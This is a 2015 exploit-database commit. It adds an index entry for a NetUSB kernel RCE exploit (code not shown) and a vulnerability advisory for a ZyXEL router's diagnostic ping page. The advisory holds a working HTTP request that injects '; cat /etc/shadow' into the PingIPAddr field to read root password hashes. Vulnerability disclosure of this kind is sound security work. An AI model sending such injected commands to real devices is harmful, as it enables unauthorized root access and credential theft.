From 01940201cbe8d00ee3a83036715d59f0d1dd2e65 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 15 Oct 2015 05:04:28 +0000 Subject: [PATCH] DB: 2015-10-15 2 new exploits --- files.csv | 4 +- platforms/hardware/webapps/38455.txt | 69 +++++ platforms/multiple/remote/38454.py | 396 +++++++++++++++++++++++++++ 3 files changed, 468 insertions(+), 1 deletion(-) create mode 100755 platforms/hardware/webapps/38455.txt create mode 100755 platforms/multiple/remote/38454.py diff --git a/files.csv b/files.csv index 5a0513dce..365761778 100755 --- a/files.csv +++ b/files.csv @@ -13435,7 +13435,7 @@ id,file,description,date,author,platform,type,port 15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0 15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0 -15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 +15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 @@ -34730,5 +34730,7 @@ id,file,description,date,author,platform,type,port 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 +38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0 +38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0 38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0 diff --git a/platforms/hardware/webapps/38455.txt b/platforms/hardware/webapps/38455.txt new file mode 100755 index 000000000..12bbc3a16 --- /dev/null +++ b/platforms/hardware/webapps/38455.txt @@ -0,0 +1,69 @@ +# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability] +# Discovered by: Karn Ganeshen +# CERT VU# 870744 +# Vendor Homepage: [www.zyxel.com] +# Version Reported: [Firmware version V100AANC0b5] +# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018] + + +*Vulnerability Details* + +CWE-20 : Improper Input +Validation - CVE-2015-6018 + +The diagnostic ping function's PingIPAddr parameter in the ZyXEL +PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user +input. An attacker can execute arbitrary commands as root. + +*OS Command Injection PoC* + +The underlying services are run as 'root'. It therefore, allows dumping +system password hashes. + +*HTTP Request* + +POST /diagnostic/diagnostic_general.cgi HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 +Firefox/40.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http:///diagnostic/diagnostic_general.cgi +Cookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive +Content-Type: multipart/form-data; boundary=-------------------------- +-12062103314079176991367286444 +Content-Length: 451 + +——————————————12062103314079176991367286444 +Content-Disposition: form-data; name="InfoDisplay” +——————————————12062103314079176991367286444 +Content-Disposition: form-data; name="*PingIPAddr*" +*8.8.8.8; cat /etc/shadow * +——————————————12062103314079176991367286444 +Content-Disposition: form-data; name="Submit" +Ping +…. +*HTTP Response * +..... + +
+ +
General
+ +